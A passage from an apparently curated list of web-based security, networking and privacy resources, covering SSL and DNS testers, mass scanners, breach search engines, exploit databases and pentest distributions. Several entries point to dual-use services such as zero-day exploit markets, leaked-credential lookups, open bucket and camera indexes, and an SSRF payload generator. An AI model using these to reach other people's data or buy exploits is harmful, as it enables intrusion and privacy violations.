href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br> </p> ##### :black_small_square: SSL/Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWebยฎ SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br> </p> ##### :black_small_square: HTTP Headers & Web Linters <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br> </p> ##### :black_small_square: DNS <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br> </p> ##### :black_small_square: Mail <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br> </p> ##### :black_small_square: Encoders/Decoders and Regex testing <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br> </p> ##### :black_small_square: Net-tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br> </p> ##### :black_small_square: Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br> </p> ##### :black_small_square: Code parsers/playgrounds <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br> </p> ##### :black_small_square: Performance <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your siteโ€™s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the performance of any of your sites from across the globe.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your siteโ€™s speed around the world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your siteโ€™s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br> </p> ##### :black_small_square: Mass scanners (search engines) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - do you use Shodan for everyday work? This tool looks for randomly generated data from Shodan.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webtechsurvey.com/common-response-headers"><b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br> </p> ##### :black_small_square: Generators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fakeface.co/"><b>fakeface</b></a> - fake faces browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br> </p> ##### :black_small_square: Passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> </p> ##### :black_small_square: CVE/Exploits databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy zero-day exploits and also to sell 0day exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br> </p> ##### :black_small_square: Mobile apps scanners <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWebยฎ Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br> </p> ##### :black_small_square: Private Search Engines <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duckduckgo.com/"><b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://swisscows.com/"><b>Swisscows</b></a> - privacy safe web search<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.disconnect.me/"><b>Disconnect</b></a> - the search engine that anonymizes your searches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metager.org/"><b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br> </p> ##### :black_small_square: Secure Webmail Providers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://countermail.com/"><b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br> </p> ##### :black_small_square: Crypto <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br> </p> ##### :black_small_square: PGP Keyservers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br> </p> #### Systems/Services &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Operating Systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qubes-os.org"><b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br> </p> ##### :black_small_square: HTTP(s) Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br> </p> ##### :black_small_square: DNS Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br> </p> ##### :black_small_square: Other Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br> </p> ##### :black_small_square: Security/hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP) based in Seattle.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-holeยฎ is a DNS sinkhole that protects your devices from unwanted content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a 